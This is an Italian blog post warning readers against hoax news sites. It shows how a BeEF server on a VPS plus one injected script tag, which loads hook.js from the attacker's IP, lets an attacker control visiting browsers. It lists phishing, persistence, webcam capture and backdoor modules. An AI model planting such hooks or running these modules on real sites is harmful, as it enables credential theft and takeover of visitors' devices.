Quasi tutti i giorni mi trovo a discutere con persone che visitano siti rinomati per diffondere bufale di ogni tipo. Puntualmente spiego che questi siti pubblicano notizie false col solo scopo di attrarre il più alto numero di visitatori, per i più disparati motivi.

Uno di questi motivi è che si può prendere il controllo remoto di un computer anche semplicemente visitando una pagina web… ecco come si fa:

Ovviamente occorrono alcuni strumenti. Il modo più facile è quello di conigurare un server VPS (Virtual Private Server), acquistabile per pochi euro l’anno, con un software specifico. Nel mio caso ho testato il framework BeEF. L’acronimo significa appunto “Browser Exploitation Framework”.

Questo software permette di inserire del codice malevolo all’interno di una pagina web che, una volta visitata, consente di avere accesso al client che si collega. Ma andiamo con ordine.

Sul server VPS installiamo la suite BeEF, la avviamo ed entriamo in console tramite interfaccia web, mentre all’interno della pagina web contenente la bufala inseriremo una piccola riga di codice per fare in modo che il browser si colleghi in maniera trasparente al nostro BeEF. La riga da inserire nell’header della pagina web è la seguente

 

<script src="http://<IP>:3000/hook.js"></script>

dove ovviamente occorre inserire l’indirizzo IP della macchina BeEF.

Da una macchina client (vittima) apriamo un browser e puntiamo all’indirizzo della pagina bufalara… a prima vista non succede niente, nemmeno l’antivirus si accorge di nulla. Ma vediamo invece sulla macchina BeEF cosa succede.

 

nella parte sinistra la nostra vittima appare collegata, l’icona ci dice che si tratta di una macchina windows. Cliccandoci sopra appaiono un mare di opzioni interessanti, tra cui, la risoluzione dello schermo, l’elenco dei pligun installati (flash, java, ecc), versione del sistema operativo, indirizzo ip e hostname (ed altri che non elenco).

Spostiamoci sul tab “Commands” e scopriamo che possiamo fare un sacco di cose “malevole”, vediamone solo alcune. Si scopre ad esempio che selezionando il menu (Social Engineering) e cliccando su “Pretty Theft” possiamo far apparire sul monitor della vittima una finta pagina di autenticazione di Facebook, facendo finta sostanzialmente che la sessione sia scaduta. Proviamola:

 

possiamo anche configurare alcuni parametri relativi alla visualizzazione… inviamo il comando e magicamente sulla macchina vittima appare questo

 

 

L’utente medio, vedendo una pagina di autenticazione di facebook, inserisce le proprie credenziali di accesso, le quali vengono prontamente trasmesse e visualizzate a BeEF.

 

ovviamente in questo esempio non ho inserito credenziali autentiche, le ho inventate al solo scopo di farvi vedere quanto sia facile

Soddisfatti? Beh, no… abbiamo un bellissimo giocattolo… giochiamoci. E giocando scopriamo ad esempio che è possibile configurare anche un meccanismo di persistenza. Cosa significa? Semplice, che ogni volta che la vittima aprirà il browser si connetterà automaticamente a BeEF, finendo sotto il controllo dell’hacker che lo gestisce. E’ anche possibile sfruttare moduli esterni come ad esempio il modulo  browser_autopwn di metasploit… fantastico dal punto di vista dell’hacker, disastroso da quello della vittima.

Ovviamente non è tutto. Da qui possiamo anche configurare con un click un utente amministrativo sulla piattaforma wordpress, prendendo quindi possesso degli eventuali blog gestiti dalla vittima. Per rubare le credenziali Skype e relativi contatti c’è un modulo apposito, così come catturare video o foto dalla webcam della vittima.

Se il browser della vittima supporta java possiamo iniettare una nostra backdoor, permettendoci quindi sia di fare furto di dati, che produrre traffico malucious (se ad esempio vogliamo lanciare un attacco ad un altra vittima sfruttando il browser appena compromesso).

Vogliamo eseguire un programma forzandolo direttamente dal browser? Bene, sotto il menu Exploit->Local Host C’è una meravigliosa opzione “Safari Launch App”. Se il browser della vittima è Safari possiamo invocare un comando direttamente da BeEF.

Il passo da qui a installare un keylogger o altri malware che possano ad esempio rubare le password memorizzate nel browser, carte di credito e così via, è molto breve. Il tutto senza che l’antivirus che abbiamo installato dia il minimo segno di allarme.

Iniziate ora a capire il motivo per cui bisogna stare alla lontana dai siti che spargono bufale? Iniziate anche a capire perchè questi siti fanno di tutto per collezionare il massimo numero di visitatori?

Certo, non tutti i siti bufalari fanno questo, altri lo fanno solo perchè nei loro script ci sono dei comandi che, sempre a vostra insaputa, metto il like per vostro conto su altre pagine facebook poco raccomandabili. Altri lo fanno per motivi politici ed altri solo perchè si divertono.

MI sento dire molte volta:”Vabè, ci sono andato una sola volta su quel sito”.. oppure “Si l’ho visto ma tanto non ci credo!”. In entrambe i casi il danno è giaà fatto

Il punto focale del discorso è che si prendono gioco di voi e danneggiano il vostro computer, senza che voi facciate nulla

Nel mondo della sicurezza informatica, chi attacca ha capito da tempo che l’anello debole della catena è l’essere umano ed è proprio quello che va attaccato. Siate smart, non fatevi fregare dai siti che spargono bufale su internet.

 

P.S: sapete una cosa… anche leggendo questo articolo potreste essere stati vittima di un attacco del genere, ma non lo saprete mai 🙂

 

 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *